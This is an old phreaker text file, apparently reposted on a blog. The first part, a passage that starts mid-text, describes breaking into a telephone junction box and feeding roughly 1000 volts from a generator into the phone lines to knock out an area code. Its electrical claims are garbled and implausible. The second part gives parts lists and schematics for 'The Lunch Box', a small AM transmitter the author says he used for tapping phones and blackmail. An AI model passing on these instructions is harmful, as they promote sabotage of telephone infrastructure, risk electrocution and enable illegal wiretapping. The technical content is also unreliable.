I will explain in detail. Take the Honda Portable Generator and all of the
other listed equiptment and go out and hunt for a green base. Make sure it is
one on the ground or hanging at head level from a pole, not the huge ones at
the top of telephone poles. Open it up with anything convienent, if you are
two feeble that fuck don't try this. Take a look inside... you are hunting
for color-coordinating lines of green and red. Now, take out your radio shack
cord and rip the meter thing off. Replace it with the voltage meter about. A
good level to set the voltage to is about 1000 volts. Now, attach the voltage
meter to the cord and set the limit for one thousand. Plug the other end of
the cord into the generator. Take the phone jack and splice the jack part
off. Open it up and match the red and green wires with the other red and
green wires. NOTE: If you just had the generator on and have done this in the
correct order, you will be a crispy critter. Keep the generator off until you
plan to start it up. Now, sauder those lines together carefully. Wrap duck
tape or insultation tape around all of the wires. Now, place the remote
control right on to the startup of the generator. If you have the long pole,
make sure it is very long and stand back as far away as you can get and reach
the pole over. NOTICE: If you are going right along with this without reading
the file first, you sill realize now tHat your area code is about to become
null! Then, getting back, twitch the pole/remote control and run for your
damn life. Anywhere, just get away from it. It will be generating so much
electricity that if you stand to close you will kill yourself. The generator
will smoke, etc. but will not stop. You are now killing your area code,
because all of that energy is spreading through all of the phone lines around
you in every direction.
Have a nice day!
<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>
<%> <%>
<%> Making the <%>
<%> <%>
<%> Lunch Box <%>
<%> ===== === <%>
<%> <%>
<%> Written, Typed and Created by: Dr. D-Code <%>
<%> <%>
<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>^<%>
Introduction
============
The Lunch Box is a VERY simple transmitter which can be handy for all sorts of
things. It is quite small and can easily be put in a number of places. I have
successfully used it for tapping fones, getting inside info, blackmail and
other such things. The possibilities are endless. I will also include the plans
for an equally small receiver for your newly made toy. Use it for just about
anything. You can also make the transmitter and receiver together in one box
and use it as a walkie talkie.
Materials you will need
=======================
(1) 9 volt battery with battery clip
(1) 25-mfd, 15 volt electrolytic capacitor
(2) .0047 mfd capacitors
(1) .022 mfd capacitor
(1) 51 pf capacitor
(1) 365 pf variable capacitor
(1) Transistor antenna coil
(1) 2N366 transistor
(1) 2N464 transistor
(1) 100k resistor
(1) 5.6k resistor
(1) 10k resistor
(1) 2meg potentiometer with SPST switch
Some good wire, solder, soldering iron, board to put it on, box (optional)
Schematic for The Lunch Box
===========================
This may get a tad confusing but just print it out and pay attention.
!
51 pf
!
---+---- ------------base collector
! )( 2N366 +----+------/\/\/----GND
365 pf () emitter !
! )( ! !
+-------- ---+---- ! !
! ! ! ! !
GND / .022mfd ! !
10k\ ! ! !
/ GND +------------------------emitter
! ! ! 2N464
/ .0047 ! base collector
2meg \----+ ! ! +--------+ !
/ ! GND ! ! !
GND ! ! !
+-------------+.0047+--------------------+ ! !
! +--25mfd-----+
-----------------------------------------+ ! !
microphone +--/\/\/-----+
---------------------------------------------+ 100k !
!
GND---->/<---------------------!+!+!+---------------+
switch Battery
from 2meg pot.
Notes about the schematic
=========================
1. GND means ground
2. The GND near the switch and the GND by the 2meg potentiometer should be
connected.
3. Where you see: )(
()
)( it is the transistor antenna coil with 15 turns of
regular hook-up wire around it.
4. The middle of the loop on the left side (the left of "()") you should run
a wire down to the "+" which has nothing attached to it. There is a .0047
capacitor on the correct piece of wire.
5. For the microphone use a magnetic earphone (1k to 2k).
6. Where you see "[!]" is the antenna. Use about 8 feet of wire to broadcast
approx 300ft. Part 15 of the FCC rules and regulation says you can't
broadcast over 300 feet without a license. (Hahaha). Use more wire for an
antenna for longer distances. (Attach it to the black wire on the fone
line for about a 250 foot antenna!)
Operation of the Lunch Box
==========================
This transmitter will send the signals over the AM radio band. You use the
variable capacitor to adjust what freq. you want to use. Find a good unused
freq. down at the lower end of the scale and you're set. Use the 2 meg pot. to
the 2meg is for turning the Lunch Box on and off. When everything is adjusted,
turn on an AM radio adjust it to where you think the signal is. Have a friend
say some shit thru the Box and tune in to it. That's all there is to it. The
plans for a simple receiver are shown below:
The Lunch Box receiver
======================
(1) 9 volt battery with battery clip
(1) 365 pf variable capacitor
(1) 51 pf capacitor
(1) 1N38B diode
(1) Transistor antenna coil
(1) 2N366 transistor
(1) SPST toggle switch
(1) 1k to 2k magnetic earphone
Schematic for receiver
======================
[!]
!
51 pf
!
+----+----+
! !
) 365 pf
(----+ !
) ! !
+---------+---GND
!
+---*>!----base collector-----
diode 2N366 earphone
emitter +-----
! !
GND !
-
+
- battery
+
GND------>/<------------+
switch
Closing statement
=================
This two devices can be built for under a total of $10.00. Not too bad. Using
these devices in illegal ways is your option. If you get caught, I accept NO
responsibility for your actions. This can be a lot of fun if used correctly.
Hook it up to the red wire (I think) on the fone line and it will send the
conversation over the air waves. If you have any problems or are confused,
leave me mail on:Hi-Times=702/832/7469 Warez House=702/827/9273
______________________________________________________________________________
Sysops of other systems may use the file as long as none of it is altered.
______________________________________________________________________________
This has been a High Mountain Hackers Production- (c) 1985 by HMH Industries
______________________________________________________________________________
Subscribe to:
Posts (Atom)